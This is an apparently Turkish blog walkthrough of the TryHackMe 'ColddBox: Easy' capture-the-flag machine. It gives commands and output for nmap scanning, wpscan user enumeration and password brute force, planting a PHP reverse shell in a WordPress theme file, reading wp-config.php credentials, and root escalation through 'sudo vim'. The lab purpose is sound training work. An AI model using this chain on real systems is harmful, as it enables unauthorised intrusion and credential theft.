Table of Contents
Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Colddbox: Easy” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…
Çözüm
1 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.
[root:/home/alper/Desktop/TRYHACKME]# nmap -sS -sV -p- 10.10.255.233
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-06 16:18 +03
Nmap scan report for 10.10.255.233
Host is up (0.067s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
4512/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
2 — HTTP Servisine gittiğim zaman bir wordpress sayfası karşıma çıkıyor. “wpscan” aracını kullanarak kullanıcı adı taraması yapıyorum. “hugo”, “c0ldd” ve “philip” adında kullanıcıları buluyorum. Bu isimleri bir dosyaya kaydedip parola saldırısını başlatıyorum ve “c0ldd” kullanıcısının parolasını buluyorum.
[root:/home/alper/Desktop/TRYHACKME]# wpscan --url http://10.10.255.233 -e u
*
*
[root:/home/alper/Desktop/TRYHACKME]# wpscan --url http://10.10.255.233 --usernames usernames.txt --passwords /usr/share/wordlists/rockyou.txt
*
[+] Performing password attack on Wp Login against 3 user/s
[SUCCESS] - c0ldd / *CENSORED*
^Cying hugo / teamomucho Time: 00:06:20 < > (3748 / 43034400) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: c0ldd, Password: *CENSORED*
*
3 — “http://10.10.255.233/wp-login.php” adresine gidip giriş yapıyorum. Daha sonra soldaki menüden “Appearance -> Editor” kısmına geliyorum. “404.php” adlı dosyanın içeriğini “PHP reverse shell” ile değiştiriyorum. Kali Linux kullanıyorsanız. “cat /usr/share/webshells/php/php-reverse-shell.php” komutunu yazarak o kodları buraya yapıştırabilirsiniz.
[root:/home/alper/Desktop/TRYHACKME]# cat /usr/share/webshells/php/php-reverse-shell.php
4 — “http://10.10.255.233/wp-content/themes/twentyfifteen/404.php” adresine giderek reverse shell bağlantısını tetikliyorum. Bağlantıyı kurduktan sonra “wp-config.php” dosyasının içeriğini okuyarak “c0ldd” kullanıcısının parolasını görüyorum.
$ whoami
www-data
$ cat /var/www/html/wp-config.php
<?php
/**
5 – 4512 port ile SSH bağlantısını kurduktan sonra ilk bayrağımı elde ediyorum.
c0ldd@ColddBox-Easy:~$ ls
user.txt
c0ldd@ColddBox-Easy:~$ cat user.txt
***CENSORED***
6 — “sudo -l” komutu ile sudo yetkisi ile çalıştırabileceğim komutları görüntülüyorum. “vim” komutunu suistimal etmek için GTFObinsden kullanmam gereken komutu öğreniyorum. Komutu girdikten sonra “root” kullanıcısına geçtiğimi görüyorum.
# ldd@ColddBox-Easy:~$ sudo vim -c ':!/bin/sh'
#
#
# whoami
root
# cat /root/root.txt
***CENSORED***